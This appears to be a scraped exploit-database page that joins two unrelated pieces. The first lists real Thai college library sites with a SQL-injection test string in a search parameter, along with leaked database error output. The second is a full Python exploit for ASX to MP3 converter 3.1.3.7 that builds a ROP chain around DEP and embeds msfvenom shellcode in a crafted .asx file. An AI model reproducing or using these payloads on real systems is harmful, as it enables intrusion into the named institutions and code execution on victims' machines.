[+] 202.129.46.118/ULIB6NEW/searching.php?MSUBJECT=1%27

[+] 110.164.92.12/ULIB/searching.php?MSUBJECT=1%27

[+] pckpb.ac.th/ULIB6NEW/searching.php?MSUBJECT=1%27

[+] library.tni.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] library.kku.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] smnc.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27

[+] lib.svit.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27

[+] bcnlp.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] ulibm.bcnsprnw.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.cvc.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] ulib.samakkhi.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] ulib.bcnsurin.ac.th/ULIB/searching.php?MSUBJECT=1%27

###################################################################

# Example SQL Database Error :
****************************
mysqli: You have an error in your SQL syntax; check the manual that corresponds t
o your MySQL server version for the right syntax to use near ''1''' at line 1
select * from ignoreword where word='1''
select count(id) as tmpqcount FROM index_db where  
ispublish='yes' and 1     AnD   (  (subj like '%1'%' )    ) 
SELECT id,titl,auth,bibrating,mid,remoteindex FROM index_db where 
ispublish='yes' and 1     AnD   (  (subj like '%1'%' )   )   order by titl asc LIMIT 0,12

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
# Google Dork: N/A
# Date: 2019-10-06
# Exploit Author: max7253
# Vendor Homepage: http://www.mini-stream.net/
# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
# Version: 3.1.3.7.2010.11.05
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
# CVE : N/A

# Note: There is a similar exploit published but it doesn't work in the OS I used:
# https://www.exploit-db.com/exploits/42963
# This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on.


import struct
file = 'fuzz_rop.asx'
#Tested on
#OS Name:                   Microsoft Windows 7 Enterprise
#OS Version:                6.1.7601 Service Pack 1 Build 7601
#System Type:               x64-based PC

#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
buf =  b""
buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"

payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"

## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11111111)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEFEEF)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)

## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] 
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)

## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
payload += struct.pack('<L', 0xFFFFFFFF)
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x1002D038) # RETN

## Save NOPs in EAX
#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] 
#payload += struct.pack('<L', 0x90909090) # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN

payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "\x90" * 20
payload += buf

f = open(file,'w')
f.write(payload)
f.close()